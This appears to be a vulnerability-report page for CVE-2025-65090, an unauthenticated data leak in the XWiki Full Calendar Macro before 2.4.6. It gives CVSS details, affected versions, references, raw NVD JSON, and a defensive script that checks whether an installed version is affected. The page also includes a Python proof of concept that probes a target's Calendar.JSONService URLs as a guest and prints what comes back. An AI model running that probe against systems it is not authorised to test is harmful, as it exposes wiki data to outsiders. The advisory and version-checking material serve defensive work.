Security Vulnerability Report
CVE-2025-65090 CVSS 5.3 MEDIUM

CVE-2025-65090

Published: 2026-01-10 04:16:01
Last Modified: 2026-01-29 17:27:42

Description

XWiki Full Calendar Macro displays objects from the wiki on the calendar. Prior to version 2.4.6, users with the rights to view the Calendar.JSONService page (including guest users) can exploit the data leak vulnerability by accessing database info, with the exception of passwords. This issue has been patched in version 2.4.6.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
Weakness
CWE-200 (Exposure of Sensitive Information to an Unauthorized Actor)

Configurations (Affected Products)

cpe:2.3:a:xwiki:full_calendar_macro:*:*:*:*:*:xwiki:*:* - VULNERABLE
XWiki Full Calendar Macro < 2.4.6
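The CPE match above has no fixed version in the CPE string and a single versionEndExcluding bound, which is how NVD expresses "every version below 2.4.6". The following added example (not code from the report, from NVD or from the XWiki project) evaluates an installed Full Calendar Macro version against that match entry and, going beyond this single case, handles the other NVD range keys (versionStartIncluding, versionStartExcluding, versionEndIncluding) and the exact-version form where the version is pinned inside the CPE string. Treating a pre-release such as 2.4.6-SNAPSHOT as older than 2.4.6 is an assumption of this example; NVD ranges say nothing about pre-release builds.

```python
"""Evaluate a version against an NVD cpeMatch entry (constructed from this report)."""
import re

# Constructed from the configurations block of this CVE record.
CPE_MATCH = {
    "vulnerable": True,
    "criteria": "cpe:2.3:a:xwiki:full_calendar_macro:*:*:*:*:*:xwiki:*:*",
    "versionEndExcluding": "2.4.6",
}

RANGE_KEYS = (
    "versionStartIncluding",
    "versionStartExcluding",
    "versionEndIncluding",
    "versionEndExcluding",
)


def parse_version(v):
    """Turn '2.4.6' or '2.4.6-SNAPSHOT' into a comparable key.

    Components compare numerically (2.10 > 2.4), trailing zeros are
    insignificant (2.4 == 2.4.0), and a pre-release suffix sorts below the
    plain release with the same numbers (assumption, see lead-in).
    """
    m = re.fullmatch(r"(\d+(?:\.\d+)*)(?:-([0-9A-Za-z.]+))?", v.strip())
    if not m:
        raise ValueError(f"unparseable version: {v!r}")
    nums = [int(x) for x in m.group(1).split(".")]
    while len(nums) > 1 and nums[-1] == 0:
        nums.pop()
    pre = m.group(2)
    return (tuple(nums), 0 if pre else 1, pre or "")


def in_range(version, match):
    """True if `version` satisfies every range bound of the cpeMatch entry."""
    v = parse_version(version)
    bounds = {k: parse_version(match[k]) for k in RANGE_KEYS if k in match}
    if not bounds:
        # No range keys: the version is pinned in the CPE string itself
        # (6th colon-separated field), or '*' for all versions.
        cpe_version = match["criteria"].split(":")[5]
        return cpe_version == "*" or parse_version(cpe_version) == v
    checks = {
        "versionStartIncluding": lambda b: v >= b,
        "versionStartExcluding": lambda b: v > b,
        "versionEndIncluding": lambda b: v <= b,
        "versionEndExcluding": lambda b: v < b,
    }
    return all(checks[k](b) for k, b in bounds.items())


def is_affected(version, match=CPE_MATCH):
    """True if the installed version is inside a cpeMatch flagged vulnerable."""
    return bool(match.get("vulnerable")) and in_range(version, match)


if __name__ == "__main__":
    for candidate in ("2.4.5", "2.4.6-SNAPSHOT", "2.4.6", "2.10.0"):
        print(candidate, "affected" if is_affected(candidate) else "not affected")
```

Note the numeric comparison: a naive string compare would call 2.10.0 vulnerable because "2.10" sorts before "2.4", which is a common false positive in home-grown version checks.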

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import sys

import requests

# CVE-2025-65090 PoC - XWiki Full Calendar Macro Information Disclosure
# Target: XWiki instance with Full Calendar Macro < 2.4.6
# Author: Security Research


def exploit_cve_2025_65090(target_url):
    """
    Exploit for CVE-2025-65090 - XWiki Full Calendar Macro JSONService
    Information Disclosure.

    This PoC demonstrates how an unauthenticated user can access sensitive
    data through Calendar.JSONService.
    """
    # Candidate URLs for the Calendar.JSONService page. In XWiki the document
    # reference "Calendar.JSONService" means space "Calendar", page
    # "JSONService", which is served at /bin/view/Calendar/JSONService; the
    # remaining paths are the original PoC's guesses, kept as fallbacks.
    endpoints = [
        "/xwiki/bin/view/Calendar/JSONService",
        "/xwiki/bin/view/Main/Calendar.JSONService",
        "/xwiki/bin/view/XWiki/Calendar.JSONService",
        "/Calendar.JSONService",
    ]

    print("[*] CVE-2025-65090 - XWiki Full Calendar Macro Information Disclosure")
    print(f"[*] Target: {target_url}")

    for endpoint in endpoints:
        url = target_url.rstrip("/") + endpoint
        print(f"\n[*] Testing endpoint: {url}")
        try:
            # Send GET request without authentication: the vulnerability is
            # that guest (unauthenticated) view rights are enough.
            response = requests.get(url, timeout=10)
        except requests.exceptions.RequestException as e:
            print(f"[!] Request failed: {e}")
            continue

        if response.status_code != 200:
            print(f"[*] Status Code: {response.status_code}")
            continue

        print("[!] Potential vulnerability detected!")
        print(f"[!] Status Code: {response.status_code}")
        print(f"[!] Response Length: {len(response.text)} bytes")
        # Heuristic only: any rendered XWiki page contains the string "xwiki",
        # so a hit here means "page reachable as guest", not a confirmed leak.
        # Inspect the sample output for wiki object data before reporting.
        body = response.text.lower()
        if "xwiki" in body or "class" in body:
            print("[!] Response contains potential database information")
            print("[*] Sample response (first 500 chars):")
            print(response.text[:500])
            return True

    return False


if __name__ == "__main__":
    # Example usage: python poc.py http://target-xwiki-instance.com
    target = sys.argv[1] if len(sys.argv) > 1 else "http://target-xwiki-instance.com"
    exploit_cve_2025_65090(target)
```

References

https://github.com/xwiki-contrib/macro-fullcalendar/commit/25bc14c181c9a92f493b20ac264388c7ba171884 (Patch)
https://github.com/xwiki-contrib/macro-fullcalendar/security/advisories/GHSA-637h-ch24-xp9m (Third Party Advisory)
https://jira.xwiki.org/browse/FULLCAL-82 (Permissions Required)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-65090",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-10T04:16:01.013",
    "lastModified": "2026-01-29T17:27:42.427",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "XWiki Full Calendar Macro displays objects from the wiki on the calendar. Prior to version 2.4.6, users with the rights to view the Calendar.JSONService page (including guest users) can exploit the data leak vulnerability by accessing database info, with the exception of passwords. This issue has been patched in version 2.4.6."
      },
      {
        "lang": "es",
        "value": "El Macro XWiki Full Calendar muestra objetos de la wiki en el calendario. Antes de la versión 2.4.6, los usuarios con derechos para ver la página Calendar.JSONService (incluidos los usuarios invitados) pueden explotar la vulnerabilidad de fuga de datos al acceder a información de la base de datos, con la excepción de las contraseñas. Este problema ha sido parcheado en la versión 2.4.6."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [{"lang": "en", "value": "CWE-200"}]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:xwiki:full_calendar_macro:*:*:*:*:*:xwiki:*:*",
                "versionEndExcluding": "2.4.6",
                "matchCriteriaId": "593D6873-0334-4275-922F-82A16C720D5D"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/xwiki-contrib/macro-fullcalendar/commit/25bc14c181c9a92f493b20ac264388c7ba171884",
        "source": "[email protected]",
        "tags": ["Patch"]
      },
      {
        "url": "https://github.com/xwiki-contrib/macro-fullcalendar/security/advisories/GHSA-637h-ch24-xp9m",
        "source": "[email protected]",
        "tags": ["Third Party Advisory"]
      },
      {
        "url": "https://jira.xwiki.org/browse/FULLCAL-82",
        "source": "[email protected]",
        "tags": ["Permissions Required"]
      }
    ]
  }
}
```